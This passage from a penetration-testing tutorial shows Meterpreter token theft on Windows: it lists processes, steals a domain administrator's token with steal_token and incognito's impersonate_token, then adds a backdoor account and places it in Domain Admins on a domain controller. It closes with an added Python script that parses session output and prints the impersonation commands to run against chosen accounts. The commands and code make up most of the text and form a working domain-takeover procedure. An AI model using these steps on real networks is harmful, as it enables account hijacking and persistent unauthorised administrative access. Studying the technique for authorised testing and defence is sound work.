Using ps

For this example, we'll use the Meterpreter command ps to list the running processes and the account each one is running under. We'll use the domain name SNEAKS.IN and the user account ihazdomainadmin.

meterpreter > ps

Process list
============

 PID   Name                 Arch  Session  User                          Path
 ---   ----                 ----  -------  ----                          ----
 0     [System Process]
 4     System               x86   0        NT AUTHORITY\SYSTEM
 380   cmd.exe              x86   0        SNEAKS.IN\ihazdomainadmin     \SystemRoot\System32\cmd.exe

. . . SNIP . . .

meterpreter >

As shown in the following listing, we use steal_token with the PID (380 in this case) to duplicate that process's primary token and assume the role of the domain administrator. Opening another user's process to take its token typically requires that the Meterpreter session already be SYSTEM (or an administrative token holding SeDebugPrivilege); if steal_token fails with an access error, run getsystem first and try again:

meterpreter > steal_token 380
Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >

We have successfully impersonated the domain administrator account, and Meterpreter is now running under the context of that user; getuid will report SNEAKS.IN\ihazdomainadmin, and rev2self drops back to the original token when we are done.

In some cases, ps may not list any process running as a domain administrator. ps only shows the account each process runs as, whereas incognito enumerates the token handles held by processes on the system, so a token left behind by a domain administrator's logon session (an interactive or RDP logon, or a service that impersonated the user) can be available even when no visible process runs as that user. When performing a penetration test, we should check the output of both ps and incognito because the results may vary.

We load incognito with use incognito and then list tokens with list_tokens -u. Looking through the list of tokens, we see the SNEAKS.IN\ihazdomainadmin user account under Delegation Tokens Available. Note the warning at the top of the output: when the session is not running as SYSTEM, incognito cannot see every token on the box, so if the account you want is missing, run getsystem and list the tokens again. Now we can pretend to be someone else.

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin 
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

As shown in the next listing, we successfully impersonate the ihazdomainadmin token, add a user account, and then give that account domain administrator rights. (Be sure to use two backslashes, \\, when entering the DOMAIN\USERNAME on the Meterpreter prompt, since a single backslash is treated as an escape character.) Our domain controller is 192.168.33.50.

meterpreter > impersonate_token SNEAKS.IN\\ihazdomainadmin 
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter > add_user omgcompromised p@55w0rd! -h 192.168.33.50 
[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcompromised -h 192.168.33.50
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller 192.168.33.50
[+] Successfully added user to group

When entering the add_user and add_group_user commands, be sure to specify the -h flag, which tells incognito which host to create the account on; in this case, that is the IP address of a domain controller. These two commands only work from a delegation token: an impersonation token is valid for local actions on the compromised host but cannot authenticate to the domain controller over the network. The implications of this attack are devastating. Essentially, the Windows access token that a domain administrator leaves behind on any system they log on to can be assumed and used to act as that account across the entire domain. This means that every server on your network is your weakest link, and defensively it is the reason domain administrators should log on only to domain controllers and dedicated administrative hosts, never to ordinary member servers.
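As an added example, not code from the original text or from the Metasploit project, the following Python script automates the check the text recommends: it parses captured ps and list_tokens -u output in the format shown above, correlates the two views for a list of target accounts, and prints the steal_token and impersonate_token commands to use, with the backslash doubled for incognito. It also records whether the token is a delegation token (usable against the domain controller with -h) and suggests getsystem when the list was incomplete. The sample listings inside it are constructed from the ones on this page, and the extra svchost.exe row and the function names are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample output modelled on the listings on this page (not a real capture).
PS_OUTPUT = """\
Process list
============

 PID   Name                 Arch  Session  User                          Path
 ---   ----                 ----  -------  ----                          ----
 0     [System Process]
 4     System               x86   0        NT AUTHORITY\\SYSTEM
 380   cmd.exe              x86   0        SNEAKS.IN\\ihazdomainadmin    \\SystemRoot\\System32\\cmd.exe
 512   svchost.exe          x86   0        NT AUTHORITY\\NETWORK SERVICE  \\SystemRoot\\System32\\svchost.exe
"""

LIST_TOKENS_OUTPUT = """\
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
SNEAKS.IN\\ihazdomainadmin
IHAZSECURITY\\Administrator
NT AUTHORITY\\LOCAL SERVICE
NT AUTHORITY\\NETWORK SERVICE
NT AUTHORITY\\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\\ANONYMOUS LOGON
"""

# One row of `ps`: PID, image name, arch, session, owner (may contain single spaces,
# e.g. "NT AUTHORITY\SYSTEM"), then an optional path after two or more spaces.
PS_ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+(?P<session>\d+)\s+"
    r"(?P<user>\S+(?: \S+)*)(?:\s{2,}(?P<path>\S.*?))?\s*$"
)


def parse_ps(text: str) -> List[Dict]:
    """Return the process rows that carry an owner; headers and the idle process are skipped."""
    rows = []
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if m:
            rows.append({"pid": int(m["pid"]), "name": m["name"],
                         "user": m["user"], "path": m["path"]})
    return rows


def parse_list_tokens(text: str) -> Dict:
    """Split `list_tokens -u` output into delegation and impersonation token names."""
    tokens = {"delegation": [], "impersonation": [],
              # incognito warns when the session is not SYSTEM; the list is then incomplete.
              "partial": "not all tokens will be available" in text}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Delegation Tokens"):
            section = "delegation"
        elif line.startswith("Impersonation Tokens"):
            section = "impersonation"
        elif line and section and not line.startswith(("=", "[")):
            tokens[section].append(line)
    return tokens


def plan_impersonation(ps_text: str, tokens_text: str, targets: List[str]) -> List[Dict]:
    """For each DOMAIN\\user in targets, correlate both listings and emit the commands to use it."""
    procs = parse_ps(ps_text)
    tokens = parse_list_tokens(tokens_text)
    plan = []
    for target in targets:
        key = target.lower()
        pids = [p["pid"] for p in procs if p["user"].lower() == key]
        delegation = any(t.lower() == key for t in tokens["delegation"])
        impersonation = any(t.lower() == key for t in tokens["impersonation"])
        commands = [f"steal_token {pid}" for pid in pids]
        if delegation or impersonation:
            # incognito needs the backslash doubled on the Meterpreter prompt.
            commands.append("impersonate_token " + target.replace("\\", "\\\\"))
        plan.append({
            "target": target, "pids": pids,
            "delegation": delegation,
            # Only a delegation token can authenticate to another host (e.g. the DC for add_user -h).
            "remote_ok": delegation,
            "commands": commands,
            "hint": ("run getsystem and list_tokens again"
                     if not commands and tokens["partial"] else None),
        })
    return plan


if __name__ == "__main__":
    for entry in plan_impersonation(PS_OUTPUT, LIST_TOKENS_OUTPUT,
                                    ["SNEAKS.IN\\ihazdomainadmin",
                                     "IHAZSECURITY\\Administrator",
                                     "SNEAKS.IN\\nobody"]):
        print(entry)
```

Feed it the real output of ps and list_tokens -u from a session (for example saved with spool) and a list of the domain accounts you care about; an entry with pids but no delegation token means steal_token is the route, an entry with a delegation token but no process is the incognito case the text describes, and remote_ok tells you whether add_user -h against the domain controller can be expected to work.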